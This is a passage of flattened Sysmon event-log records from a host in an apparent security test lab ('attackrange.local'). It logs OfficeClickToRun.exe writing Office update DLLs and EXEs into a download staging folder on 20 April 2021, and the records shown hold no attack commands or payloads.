Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\v8jsi.dll2021-04-20 14:54:04.722 11241100x800000000000000063913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VVIEWDWG.DLL2021-04-20 14:54:04.675 11241100x800000000000000063912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\VVIEWER.DLL2021-04-20 14:54:04.565 11241100x800000000000000063911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WEBSANDBOX.DLL2021-04-20 14:54:04.550 11241100x800000000000000063910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WebView2Loader.dll2021-04-20 14:54:04.550 11241100x800000000000000063909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\windowsspeakerrecosdk.dll2021-04-20 14:54:04.550 11241100x800000000000000063908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.440{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordcnvr.dll2021-04-20 14:54:04.440 11241100x800000000000000063907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:04.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WORDICON.EXE2021-04-20 14:54:04.362 11241100x800000000000000063906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:04.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XLICONS.EXE2021-04-20 14:54:04.347 11241100x800000000000000063905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\XLINTL32.COMMON.DLL2021-04-20 14:54:04.315 11241100x800000000000000063904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGCORE.DLL2021-04-20 14:54:04.300 11241100x800000000000000063903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGHELP.DLL2021-04-20 14:54:04.284 11241100x800000000000000063902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE2021-04-20 14:54:04.268 11241100x800000000000000063901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE2021-04-20 14:54:04.268 11241100x800000000000000063899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:04.268 11241100x800000000000000063896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:04.268 11241100x800000000000000063878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcp120.dll2021-04-20 14:54:04.253 11241100x800000000000000063877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcr120.dll2021-04-20 14:54:04.253 11241100x800000000000000063876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\ucrtbase.dll2021-04-20 14:54:04.253 11241100x800000000000000063875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\hxds.dll2021-04-20 14:54:04.237 11241100x800000000000000063874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.237{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\itircl55.dll2021-04-20 14:54:04.237 11241100x800000000000000063873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\msitss55.dll2021-04-20 14:54:04.222 11241100x800000000000000063872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\MSClientDataMgr\MSCDM.DLL2021-04-20 14:54:04.222 11241100x800000000000000063871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODATASERVICE.DLL2021-04-20 14:54:04.222 11241100x800000000000000063870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEODBC.DLL2021-04-20 14:54:04.222 11241100x800000000000000063869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEOLEDB.DLL2021-04-20 14:54:04.222 11241100x800000000000000063868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEWSS.DLL2021-04-20 14:54:04.222 11241100x800000000000000063867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEXBE.DLL2021-04-20 14:54:04.222 11241100x800000000000000063866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLL2021-04-20 14:54:04.206 11241100x800000000000000063865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AIRWER.DLL2021-04-20 14:54:04.206 11241100x800000000000000063864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:04.206 11241100x800000000000000063861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:04.206 11241100x800000000000000063856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:04.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:04.190 11241100x800000000000000063855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 